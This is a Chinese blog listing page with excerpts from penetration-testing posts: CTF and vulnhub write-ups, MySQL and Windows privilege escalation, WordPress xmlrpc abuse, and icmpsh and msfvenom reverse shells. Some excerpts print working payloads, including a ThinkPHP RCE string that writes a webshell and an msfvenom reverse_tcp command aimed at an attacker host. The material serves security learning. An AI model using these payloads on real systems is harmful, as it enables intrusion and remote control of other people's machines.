自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(83)
  • 收藏
  • 关注

原创 MySQL提权总结(建议收藏)

原文地址:https://www.cnblogs.com/sfsec/p/15241860.html前言数据库权限在平常的渗透提权中,我们通常可以在一些特殊情况下得到数据库的用户名和密码(最高权限root),如下:MySQL 3306 端口弱口令爆破sqlmap 注入的 --sql-shell 模式网站的数据库配置文件中拿到明文密码信息CVE-2012-2122 等这类漏洞直接拿下 MySQL 权限口令爆破、sqlmap的--sql-shell模式和数据库配置文件中拿明文密码已经

2021-09-08 11:24:40 672

原创 [RoarCTF 2019]Easy Calc

进入题目是一个计算器的功能界面查看源代码,可以发现是有WAF的,且存在一个calc.php文件这里接收一个num参数,可以看到这里创建了一个黑名单列表,然后用正则是去匹配,进行非法参数的过滤。那这题就是要绕过这个过滤和过一个WAF了。先传入一个?num=1测试一下。传入字母就会报错,这里应该是被WAF文件给拦截了。要对这WAF进行绕过,这里就涉及到一个知识点了。PHP的字符串解析特性我们知道PHP将查询字符串(在URL或正文中)转换

2021-09-02 17:02:31 316

原创 [BJDCTF2020]Easy MD5

进入题目是一个提交框提交一个1,发现有个password参数尝试了下常规的sql注入无果,在network中找到hint提示select * from 'admin' where password=md5($pass,true)这里的MD5我们用ffifdyop来进行绕过,原理是ffifdyop这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ‘ or ‘6。而 Mysql 刚好又会吧

2021-09-02 17:00:50 236

原创 [极客大挑战 2019]HardSQL

进入题目,一个登录框。测试了下万能密码登录,无果,有WAF拦截,那接下来就是绕过WAF。先抓包用bp进行FUZZ,看看有那些没有被拦截的函数。通过手工FUZZ和bpFUZZ结合,发现过滤了and、= 空格 union等多个sql关键字。发现有一些,报错注入的函数是没有被过滤的,那我们这题就可以通过报错注入来进行注入。这里我们利用updatexml函数进行报错注入。payload#查看数据库信息http://2d43986a-ef4e

2021-09-02 16:59:21 181

原创 [GXYCTF2019]BabySQli

进入题目一个登录框对登录框做了一些常规的sql注入和fuzz发现都无果。然后在等级登录后跳转的search.php页面查看源代码发现一段编码。MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5发现其是一段base32编码,解码后发现又是一段base64编码。c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZ

2021-09-02 16:58:02 246

原创 网络安全总结好文(私人博客收录备份)

https://www.cnblogs.com/sfsec/p/15162635.html //最全windows提权总结(建议收藏)

2021-08-19 21:03:01 198

原创 Linux Centos7 安装 docker 速度过慢最靠谱解决方法

1. 卸载旧版本sudo yum remove \docker \docker-client \docker-client-latest \docker-common \docker-latest \docker-latest-logrotate \docker-logrotate \docker-engine2. 安装必要的系统工具sudo yum install -y \yum-utils \device-mapper-persistent-data \lvm23. 设置稳

2021-05-26 16:22:22 1551

原创 kali自带字典用法

路径:/usr/share/wordlists/dirbbig.txt #大的字典small.txt #小的字典catala.txt #项目配置字典common.txt #公共字典euskera.txt #数据目录字典extensions_common.txt #常用文件扩展名字典indexes.txt #首页字典mutations_common.txt #备份扩展名spanish.txt #方法名或库目录others #扩展目录,默认用户名等stress #压力测试vulns

2021-05-15 18:58:06 5058

转载 WordPress xmlrpc.php 漏洞利用

WordPress采用了XML-RPC接口.并且通过内置函数WordPress API实现了该接口内容。 所以,你可要通过客户端来管理Wordpress。 通过使用WordPress XML-RPC, 你可以使用业界流行博客客户端Weblog Clients来发布你的WordPress日志和页面。同时,XML-RPC 也可使用extended by WordPress Plugins插件来自定义你的规则。0X01 激活XML-RPC从3.5版本开始,XML-RPC功能默认开启。 早些版本,可通过.

2021-05-15 11:27:03 3383

原创 vulnhub靶机 | DC-1 write-up

搭建好环境,我们用nmap来扫描靶机的ip地址nmap -sP 192.168.110.1/24扫描到靶机的ip地址为192.168.110.174,那接下来我们来进行扫描一下端口nmap -sV 192.168.110.174发现开放一些22 ssh端口 80 web端口,那我们先访问一下web端口。简单尝试了一下弱口令 admin admin 等账号密码,发现没有用,那我们就对其进行信息收集一下。可以看到以上信息,可以看到一个cms是一个Drupal7的.

2021-05-14 17:26:08 258 1

转载 linux 密码文件 /etc/shadow md5,SHA256,SHA512 破解

目录环境shadow文件解析John the Ripper安装John the Ripper破解环境Kali系统 John the Ripper密码破解者shadow文件解析文件的格式为:{用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效天数}:{保留}其中{加密后的口令密码}的格式

2021-05-12 16:24:18 1180

原创 vulnhub靶机 | DriftingBlues:6 write-up

nmap -sP 192.168.110.1/24 #首先扫描存活网段扫描出靶机地址是192.168.110.169。在对其详细服务进行扫描。nmap -sV 192.168.110.169开着一个80端口,进行访问。发现只有一张图片,那我们只好开始CTF的套路了,扫描目录。python3 dirsearch.py -u http://192.168.110.169/ #用dirsearch扫描目录扫到robots.txt文件,进行访问一下。有...

2021-05-06 11:09:58 672 2

原创 vulnhub靶机 | DriftingBlues:7 write-up

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/题目的目标是要夺到里面的flag,搭建好环境如图。首先用nmap扫描一下ip地址nmap-sP192.168.110.1/24#扫描网段中存活主机nmap-p-192.168.110.167 #在看看上面运行的服务nmap-sV192.168.110.167#查看服务版本上面运行的一些apache、...

2021-05-04 15:31:21 8184 2

原创 AVWS+Xray联动(详细版)

正文awvs的爬虫很厉害,xray的扫描能力更强,而且xray的社区版不能爆破子域名。awvs+xray联动就互相取长补短了。首先安装AWVS(这里用的是AWVS13破解版,软件在文末),具体破解版安装,压缩包里面有文档,这里就不再详细叙述了。安装好界面如下。安装好后我们就在Xray(社区版,软件在文末)开启监听。python xray.exe webscan --listen 127.0.0.1:8888 --html-output 456.html然后...

2021-04-30 08:39:19 4065

原创 江苏专转本计算机专业考试内容

计算机类专业理论考试大纲........计算机专业大类专业综合操作技能考试大纲.......完整大纲 公众号 猪猪谈安全 回复 江苏专转本 即可

2020-12-02 13:04:20 2281

转载 App渗透 - 从SQL注入到人脸识别登录绕过

App渗透 - 人脸识别登录绕过打开APP是一个登录框抓包后发现参数被加密了使用Jadx脱源码发现,并没有加壳也没有混淆,运气很好根据经验,先搜索Encrypt、Decrypt等关键字,发现在Common.js中有一个encryptData函数定位过去,一套加解密算法都写好了放在这放到浏览器console里面调试,果然没错首先测试了一下注入明文:{"userName":"TEST'","passWord":"123456","osType":"android","osVer

2020-10-05 15:49:06 1851 1

原创 利用icmpsh建立icmp隧道反弹shell

首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git我们可以直接用git克隆过来git clonehttps://github.com/inquisb/icmpsh.git然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP等协议的访问pip2 install impacket接下来我们还需要关闭我们之前的ping命令应答程序,这样可以防止内核自己对ping包进行响应。sysc.

2020-09-25 16:09:46 717

原创 渗透测试之信息收集

信息收集搞渗透的人应该都清楚,信息收集对于渗透测试来说是非常重要的,我们手上掌握的目标的信息越多,成功渗透的概率就越大,而信息收集又分为两类。第一类:主动信息收集:通过直接访问、扫描网站,这种流量将流经网站第二类:被动信息收集:利用第三方的服务对目标进行访问了解,比例:Google搜索、Shodan搜索等正所谓知己知彼百战百胜,下面就来介绍一些信息收集的常用手段。域名域名注册人信息收集访问https://www.chinaz.com/ 站长之家这个网站大家还可以点击.

2020-09-17 20:35:03 955

原创 渗透测试之信息收集(三)

一、判断操作服务器类型1、利用windows于linux对大小写敏感的特性区别Linux操作系统大小写敏感,我们将网址url一些字母修改成修改大小写看网站是否还能正常访问,能访问就是windows服务器,不能则是Linux。例访问一个网站,如下图这是把小写n改为N看是否还能正常访问正常访问证明服务器是windows2、ping测试通过ping操作系统判断TTL返回值来判断操作系统TTL起始值:Windows xp(及在此版本之前的windows) 128 (广域网中TTL为6

2020-09-16 08:15:19 299

原创 渗透测试之信息收集(二)

​一、google hack语法googlehack 常用语法site 指定域名intext 正文中存在关键字的网页intitle 标题中存在关键字的网页info 一些基本信息inurl URL存在关键字的网页filetype 搜索指定文件类型google语法利用实例 1、site:baidu.com #收集百度子域名2、intitle:管理登录 #查找后台...

2020-09-08 22:18:35 264

转载 某杀猪盘渗透测试

最近偶然发现一个虚拟货币买涨跌的杀猪盘,遂进行了一波测试,前台长这样。为thinkphp5.0.5随用RCE进行打入,成功写入webshell。s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmF

2020-09-08 22:15:59 1129 2

原创 渗透测试之信息收集(一)

信息收集搞渗透的人应该都清楚,信息收集对于渗透测试来说是非常重要的,我们手上掌握的目标的信息越多,成功渗透的概率就越大,而信息收集又分为两类。第一类:主动信息收集:通过直接访问、扫描网站,这种流量将流经网站第二类:被动信息收集:利用第三方的服务对目标进行访问了解,比例:Google搜索、Shodan搜索等正所谓知己知彼百战百胜,下面就来介绍一些信息收集的常用手段。域名一、域名注册人信息收集访问https://www.chinaz.com...

2020-09-07 10:38:20 717

原创 (CVE-2018-2894)Weblogic任意文件上传漏洞复现

一、什么是WebLogicWebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。二、漏洞描述Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修

2020-08-24 10:43:35 1057

原创 最新宝塔服务器面板漏洞

0x001漏洞说明【法律无情,请不要以身试法】宝塔面板Linux7.4.2以及Windows6.8版本PhpmyAdmin未加签权,通过IP:888/pma可以直接登录数据库,现已出现漏洞批量利用工具,可通过Zmap扫描全球888端口进行大规模提权0x002解决方法宝塔官方已发布紧急更新,所有使用此版本的用户升级到最新版即可解决...

2020-08-24 08:38:29 2714

转载 Windows提权总结

0x01 简介提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等0x02 按提权方法分类2.1 系统内核溢出漏洞提权此提权方法即是通过系统本身存在的一些漏洞,未曾打相应的补丁而暴露出来的提权方法,依托可以提升权限的EXP和它们的补丁编号,进行提升权限。

2020-08-20 10:19:57 929

原创 深信服 EDR终端检测响应平台 0day RCE 漏洞

0x01 介绍深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。Fofa关键字:title=“终端检测响应平台”如图0x02 RCE payloadhttps://xxx.com:xxx/tool/log/c.p

2020-08-18 15:20:54 873

原创 burpsuite保存请求日志文件

首先打开burpsuite,然后i点击options在logging里面proxy栏目下勾选requests然后创建文件名字返回桌面会出现一个test的文件夹然后我们抓包,产生的请求都会保存到这个test文件里面。

2020-08-17 10:40:32 4098

原创 什么是伪静态?网站伪静态有什么作用?

经常听说动态页面和静态页面,那么伪静态页面是什么呢?搞清楚这个概念前,我们先要了解一下什么是动态页面?什么是静态页面?动态页面:用ASP、PHP、JSP、ASP.net、Perl、或CGI等编程语言制作,不是独立存在于服务器上的网页文件,只有当用户请求时服务器才返回一个完整的网页,内容存在于数据库中,根据用户发出的不同请求,其提供个性化的网页内容。静态页面:静态页面的URL链接是以.html、htm、.shtml、.xml为链接后缀,存在于服务器上的一个文件,每个网页都是一个独立的文件,内容直接保存

2020-08-15 21:44:27 839

原创 Windows服务详解

Windows服务详解在 “开始” 的 “运行” 中 输入:services.msc进入XP自带服务修改列表可以选择关闭,手动,还是自动.自动为跟windows一起启动。手动为需要时它自行启动。关闭为永远不启动。开始吧:alerter -错误警报器,垃圾,关闭。application layer gateway service -给与第三者网络共享/防火墙支持的服务,有些防火墙/网络共享软件需要。占用1。5mb内存。application management-用于设定,发布和删除软

2020-08-15 21:14:20 3508

原创 IIS7&7.5解析漏洞复现

漏洞详情IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。当然.php前面的xx也可以省略不写,大家随意吧!环境准备首先我们在win7上安装IIS7点击程序点击打开或关闭windows功能勾选下一下信息,尽量勾选多一点防止实验失败等待安装完成后我们可以利用一个phpstudy一键搭建好我们的网站然后我们访问一下phpinfo()看看是否搭建成功

2020-08-15 15:21:29 3435

原创 IIS解析漏洞复现

一、IIS6.0IIS有两种解析漏洞。第一种是目录解析漏洞该解析漏洞形成原因是以*.asp命名的文件夹里面的文件都会被当作asp文件解析!复现首先我们先搭建一个IIS6.0的服务器,具体搭建方法见https://blog.csdn.net/xj28555/article/details/107951897,文章中还有一些常见的问题也帮大家写出来了。然后我们创建一个test.txt的文档里面写入hello_world,然后修改后缀名将test.txt改为test.jpg然后我们

2020-08-13 09:29:13 801

原创 win2003搭建iis服务器

点击添加或删除角色点击下一步点击自定义配置然后直接下一步到底。然后再管理工具里面找到iis服务管理器右键网站然后点击新建点击下一步描述大家可以随便输入,这里是测试我就输入test网站IP地址输入本地的ip地址,主机头因为是本地搭建也可以输入本地ip此处路劲填写你要搭建的web网站文件夹的存放路径勾上前三个勾点击完成这个时候可以看到如下我们可以访问一下网站发现需要密码,因为按照我上述流程安装默认是打

2020-08-12 11:50:22 909

原创 rdesktop使用参数

Usage: rdesktop [options] server[:port]-u: 用户名-d: 域-s: 可远程启动的shell/无缝应用程序-c: 工作目录-p: 密码(-to prompt)-n: 客户端主机名-k: 服务器上的键盘布局(en-us、de、sv等)-g: 桌面几何(宽X高[@DPI][+X[+Y]])-i: 启用智能卡身份验证,密码用作pin-f: 全屏模式-b: 强制位图更新-五十: 本地代码页-A: seallessrdp sh

2020-08-11 14:52:34 826

原创 python中flask用url_for反向生成url

from flask import Flask,url_forapp=Flask(__name__)@app.route('/hello',endpoint='b') #endpoint为生成别名def index(): a=url_for('b') #调用了url_for print(a) return 'hello_world'if __name__ == '__main__': app.run()如下图就打印出了/hello路径假如不加.

2020-08-10 21:59:58 340

原创 flask框架如何设置配置文件

方法一app.config['DEBUG'] = True方法二app.config.from_pyfile("settings.py") #settings.py为python文件名称方法三 import os os.environ['FLAKS-SETTINGS'] = 'settings.py' app.config.from_envvar('FLAKS-SETTINGS')方法四app.config.from_object("settings.DevCo

2020-08-10 21:16:57 471

原创 python 装饰器

1、笔前小段子内裤可以用来遮羞,但是没法避寒,所以一些人就发明了长裤,这样大家就可以避寒了。而装饰器就好比这里的长裤,在不改变内裤的作用前提下,帮助我们避寒。2、什么是装饰器,为什么要用装饰器装饰器的本质其实也是一个函数,它可以在不改变原函数的基础上,对函数的功能进行扩展,做一些自定义的操作。3、装饰器的通用格式def wapper(func): def inner(*args,**kwargs): return func(*args,**kwargs)

2020-08-10 15:12:04 105

转载 后渗透之meterpreter使用攻略

Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。0x01.系统命令1)基本系统命令sessions #sessions –h 查看帮助sessions -i <ID值> #进入会话 -k 杀死会话background #将当前会话放置后台run #执行已有的模块,输入run后按两下tab,列出已有的脚

2020-08-10 10:46:40 1951 1

原创 msfvenom生成木马的简单利用

1、简介本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。2、实验环境1、一台kali虚拟机 ip为192.168.110.1402、一台win10虚拟机3、实验步骤1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lpor.

2020-08-10 10:43:26 5549 1

转载 metasploit、msfvenom生成木马入侵电脑及手机

简介msfvenommsfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件查看所有--payload的模块msfvenom -l payloads文件后缀名-f的格式msfvenom --help-formatsmetasploitMetasploit Framework(MSF)是一款开源安全漏洞

2020-08-09 15:25:47 1499 5

原创 nc的参数使用

-c shell命令为“-e”;使用/bin/sh来执行[hargerous!!]-e文件名程序在连接后执行[危险!!]-b允许广播-g网关源路由跃点,最多8个-G num源路由指针:4,8,12。。。-h这个垃圾-发送的线路和扫描的端口的延迟间隔为1秒-k在套接字上设置keepalive选项-l监听模式,用于入站连接-n仅数字IP地址,无DNS-o文件十六进制流量转储-p端口本地端口号-r随机化本地和远程端口-在stdin上的EOF和秒延迟后q秒退出

2020-08-09 11:33:10 1077

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除